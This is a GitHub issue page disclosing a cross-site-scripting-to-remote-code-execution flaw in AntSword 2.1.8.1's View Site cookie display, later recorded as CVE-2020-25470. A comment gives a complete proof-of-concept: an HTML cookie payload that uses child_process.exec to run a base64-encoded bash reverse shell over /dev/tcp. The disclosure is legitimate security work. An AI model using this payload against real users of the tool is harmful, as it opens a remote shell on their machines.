Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

RCE Vulnerability in View Site #256

Closed
leohearts opened this issue Aug 27, 2020 · 3 comments
Closed

RCE Vulnerability in View Site #256

leohearts opened this issue Aug 27, 2020 · 3 comments
Assignees
Labels
🐛Bug 程序自身问题

Comments

@leohearts
Copy link

AntSword Ver: 2.1.8.1

There is a view site function which will show cookies in UI.
图片
图片
After few tests i got that it can parse html tags.
图片
So it can also execute javascript/node codes like this.
图片
(i used base64 encoded command which decodes asbash -i >& /dev/tcp/127.0.0.1/2333 0>&1)

@leohearts
Copy link
Author

My html code:

<script>document.cookie="a=<img src=x onerror='require(\"child_process\").exec(\"echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvMjMzMyAwPiYxCg== | base64 -d | bash\")'/>"</script>

write it into an html file, enter the address, then click "View"

@leohearts
Copy link
Author

Source code:
source/modules/viewsite/cookiemgr.js
source/modules/viewsite/index.js

@Medicean Medicean added the 🐛Bug 程序自身问题 label Aug 27, 2020
@Medicean Medicean self-assigned this Sep 7, 2020
@leohearts
Copy link
Author

CVE-2020-25470
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25470

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
🐛Bug 程序自身问题
Projects
None yet
Development

No branches or pull requests

2 participants